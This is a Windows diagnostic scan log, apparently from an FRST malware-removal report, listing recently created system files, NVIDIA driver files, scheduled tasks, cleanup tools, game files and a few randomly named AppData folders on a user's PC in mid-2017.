2017-08-08 19:26 - 2017-07-28 06:09 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-08-08 19:26 - 2017-07-28 06:09 - 000971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-08-08 19:26 - 2017-07-28 06:09 - 000579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\untfs.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 004056064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 000600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 000097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2017-08-08 19:26 - 2017-07-28 06:07 - 002211840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-08-08 19:26 - 2017-07-28 06:07 - 000112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2017-08-08 19:26 - 2017-07-28 06:07 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\RjvMDMConfig.dll
2017-08-08 19:26 - 2017-07-28 06:07 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2017-08-08 19:26 - 2017-07-28 06:07 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-08-08 19:26 - 2017-07-28 06:06 - 001833984 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll
2017-08-08 19:26 - 2017-07-28 06:06 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2017-08-08 19:26 - 2017-07-28 06:06 - 000093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\spbcd.dll
2017-08-08 19:26 - 2017-07-28 06:05 - 001536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-08-08 19:26 - 2017-07-28 06:05 - 001525760 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2017-08-08 19:26 - 2017-07-28 06:05 - 001087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-08-08 19:26 - 2017-07-28 06:05 - 000954368 _____ (Microsoft Corporation) C:\WINDOWS\system32\autoconv.exe
2017-08-08 19:26 - 2017-07-28 06:05 - 000926208 _____ (Microsoft Corporation) C:\WINDOWS\system32\autofmt.exe
2017-08-08 19:26 - 2017-07-28 06:05 - 000892928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-08-08 19:26 - 2017-07-28 06:05 - 000538112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\untfs.dll
2017-08-08 19:26 - 2017-07-28 06:05 - 000078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll
2017-08-08 19:26 - 2017-07-28 06:02 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autoconv.exe
2017-08-08 19:26 - 2017-07-28 06:02 - 000853504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autofmt.exe
2017-08-08 19:26 - 2017-07-28 06:02 - 000077312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spbcd.dll
2017-08-08 17:48 - 2017-08-08 17:48 - 000000017 _____ C:\Users\***\AppData\Local\resmon.resmoncfg
2017-08-07 23:58 - 2017-08-09 18:57 - 000000555 _____ C:\Users\***\Desktop\JRT.txt
2017-08-07 23:57 - 2017-08-07 23:56 - 001790024 _____ (Malwarebytes) C:\Users\***\Desktop\JRT.exe
2017-08-07 23:56 - 2017-08-07 23:56 - 001790024 _____ (Malwarebytes) C:\Users\***\Downloads\JRT.exe
2017-08-07 23:35 - 2017-08-07 23:34 - 008185288 _____ (Malwarebytes) C:\Users\***\Desktop\adwcleaner_7.0.1.0.exe
2017-08-07 23:34 - 2017-08-07 23:34 - 008185288 _____ (Malwarebytes) C:\Users\***\Downloads\adwcleaner_7.0.1.0.exe
2017-08-06 01:08 - 2017-08-06 01:08 - 001160480 _____ (Uniblue Systems Limited ) C:\Users\***\Downloads\pcmechanicpm.exe
2017-08-06 00:28 - 2017-08-06 00:28 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2017-08-05 22:57 - 2017-08-05 22:57 - 000000927 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-08-05 22:57 - 2017-08-05 22:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-08-04 22:53 - 2017-08-09 18:59 - 000000000 ____D C:\Users\***\.junique
2017-08-04 22:53 - 2017-08-04 22:55 - 000000000 ____D C:\Users\***\.minion
2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\***\AppData\Roaming\gg.minion.Minion
2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\***\.oracle_jre_usage
2017-08-04 22:52 - 2017-08-04 22:52 - 052825304 _____ (Good Game Mods LLC ) C:\Users\***\Desktop\Minion3.0.5.exe
2017-08-04 22:52 - 2017-08-04 22:52 - 000000664 _____ C:\Users\***\Documents\Minion.lnk
2017-08-04 22:52 - 2017-08-04 22:52 - 000000000 ____D C:\Users\***\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Good Game Mods LLC
2017-08-01 15:04 - 2017-08-06 01:24 - 000092298 _____ C:\Users\***\Desktop\Addition.txt
2017-08-01 15:01 - 2017-08-09 18:59 - 000021213 _____ C:\Users\***\Desktop\FRST.txt
2017-08-01 12:17 - 2017-08-07 23:52 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-08-01 12:17 - 2017-08-07 19:45 - 000192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-08-01 12:17 - 2017-08-01 12:32 - 000000000 ____D C:\Users\***\AppData\Local\Nybgy
2017-08-01 12:17 - 2017-08-01 12:17 - 000000000 ____D C:\ProgramData\Malwarebytes
2017-08-01 12:15 - 2017-08-07 19:45 - 000109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-08-01 12:14 - 2017-08-07 19:55 - 000000000 ____D C:\Users\***\Desktop\mbar
2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) C:\Users\***\Desktop\mbar-1.09.3.1001.exe
2017-08-01 03:41 - 2017-08-01 04:04 - 000000000 ____D C:\ProgramData\TEMP
2017-08-01 02:24 - 2017-08-01 02:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-08-01 02:04 - 2017-08-01 03:19 - 000000000 ____D C:\Users\***\AppData\LocalLow\Mozilla
2017-08-01 02:04 - 2017-08-01 03:14 - 000000000 ____D C:\Users\***\AppData\Local\Mozilla
2017-08-01 01:54 - 2017-08-08 17:26 - 000002226 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-01 01:54 - 2017-08-08 17:26 - 000002214 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-08-01 01:54 - 2017-08-01 01:54 - 000003628 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-08-01 01:54 - 2017-08-01 01:54 - 000003504 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-07-31 20:21 - 2017-07-31 20:21 - 000000000 ____D C:\Users\***\AppData\Local\PDF24
2017-07-28 19:41 - 2017-07-19 00:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-07-28 19:39 - 2017-07-19 02:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001276992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000995408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000725112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000584312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-07-28 19:39 - 2017-07-19 02:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-07-28 18:14 - 2017-07-28 18:14 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-26 19:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-07-28 18:14 - 2017-07-26 19:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-07-28 18:13 - 2017-07-28 18:13 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-26 19:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\***\AppData\Local\Usidikujp
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\***\AppData\Local\Rvurcez
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Yhwopc
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Wqy He
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Bizpiwcinu
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Bgew
2017-07-24 19:44 - 2017-07-26 19:09 - 000179136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-07-24 19:44 - 2017-07-26 19:09 - 000146368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys
2017-07-15 22:59 - 2017-07-15 22:59 - 000000000 ____D C:\Users\***\AppData\LocalLow\Thunder Lotus Games
2017-07-15 22:51 - 2017-07-15 22:51 - 000001418 _____ C:\Users\Public\Desktop\Darkest Dungeon.lnk
2017-07-11 20:54 - 2017-07-07 16:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2017-07-11 20:54 - 2017-07-07 09:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-07-11 20:54 - 2017-07-07 09:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2017-07-11 20:54 - 2017-07-07 09:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-07-11 20:54 - 2017-07-07 09:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-07-11 20:54 - 2017-07-07 09:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2017-07-11 20:54 - 2017-07-07 09:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2017-07-11 20:54 - 2017-07-07 08:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-07-11 20:54 - 2017-07-07 08:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-07-11 20:54 - 2017-07-07 08:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-07-11 20:54 - 2017-07-07 08:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-07-11 20:54 - 2017-07-07 08:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-07-11 20:54 - 2017-07-07 08:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-07-11 20:54 - 2017-07-07 08:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-07-11 20:54 - 2017-07-07 08:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2017-07-11 20:54 - 2017-06-20 08:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 08:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-07-11 20:54 - 2017-06-20 08:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-07-11 20:54 - 2017-06-20 07:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2017-07-11 20:54 - 2017-06-20 07:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe
2017-07-11 20:54 - 2017-06-20 07:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-07-11 20:54 - 2017-06-20 07:08 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
